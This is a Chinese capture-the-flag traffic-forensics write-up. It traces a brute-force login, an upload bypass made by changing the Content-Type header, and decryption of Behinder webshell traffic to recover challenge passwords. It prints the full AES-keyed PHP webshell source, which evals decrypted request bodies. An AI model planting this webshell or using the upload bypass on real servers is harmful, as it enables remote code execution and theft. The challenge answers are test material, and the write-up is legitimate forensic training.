龙信杯流量分析
分析流量包检材,给出管理员对web环境进行管理的工具名。(标准格式:小皮)
使用流量分析工具CTF-NetA,查找到宝塔流量的域名
筛选DNS,wireshark也有相关记录
bt
分析流量包检材,给出攻击者的ip地址是多少。(标准格式:127.0.0.1)
使用CTF-NetA,筛选出交流最多的IP
wireshark对于连接有记录,打开统计下的Endpoints
因为爆破的原理就是发送大量的爆破报文去尝试破解密码,所以在端点界面中点击packets,使得排序方式为从大到小排序。就可以在该图中得知192.168.209.135为发起爆破的主机,192.168.209.147为被爆破的主机
192.168.209.135
分析流量包检材,给出攻击者爆破出的网站非管理员用户名是。(标准格式:admin)
在返回包中找信息(192.168.209.147——>192.168.209.135)
定位16502数据包,在返回内容中找到saber和luna用户
也可以用tcp追踪流看
后面发现saber用户登录过管理员后台,属于管理员权限,所以答案为luna
luna
分析流量包检材,攻击者进行目录扫描得到的具有后门的页面url路径为。(标准格式:/abc.html)
一般利用点都在流量包的最后面,排序一下找到上传点
/up_load.php
分析流量包检材,攻击者通过修改请求包中的哪个字段导致恶意文件成功上传。(标准格式:test-type)
后面一连串的都是连接cont.php,怀疑是连接的webshell,这个问题应该是在问上传这个木马文件时修改了什么参数。常见的有上传图片木马,将图片上传后,bp抓包改content-type,而这题答案就是这个
找到修改点
content-type
分析流量包检材,攻击者上传成功的恶意文件, 该文件的临时存放路径是。(标准格式:/abc/edf)
就在上面一题的界面最底下
/tmp/php38mbeJ
分析流量包检材,服务器php配置文件的存放位置(标准格式:/www/sev/php.ini)
由上一题的数据包可知cont.php的代码内容——AES加密
<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b";
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>
找到流量包,可以看出符合冰蝎的流量特征(Content-type: Application/x-www-form-urlencoded),所以后面进行aes+base64的解密
原理可以参考:
1.冰蝎4.0特征分析及流量检测思路 - FreeBuf网络安全行业门户
2.冰蝎-特征检测及报文解密-腾讯云开发者社区-腾讯云 (tencent.com)
进行常规解密
AES批量加密解密 - 在线工具 (bugscaner.com)
注意要复制括号里面的内容
Base64 编码/解码 - 锤子在线工具 (toolhelper.cn)
方框内就是执行的cmd,可以确定配置文件存放路径
/www/wwwroot/192.168.209.147/wp-config.php
分析流量包检材,被攻击的web环境其数据库密码是。(标准格式:qwer1234)
和上题一样,命令执行后服务器会返回数据包,所以要看返回的流量—— 分组 20299
这些流量和上面操作一样,进行解密
X847Z3QzF1a6MHjR
分析流量包检材,服务器管理存放临时登录密码的位置。(标准格式:/tmp/pass)
在612流中,发现了其正在查看一个tmppass文件
/tmp/tmppass
分析流量包检材,黑客获取的高权限主机的登录密码。(标准格式:qwer1234)
查看上一题返回值,解密流程和上面一样
标签:分析,流量,龙信杯,192.168,格式,php,包检材 From: https://www.cnblogs.com/yanke-wolf/p/18515018passwd!@#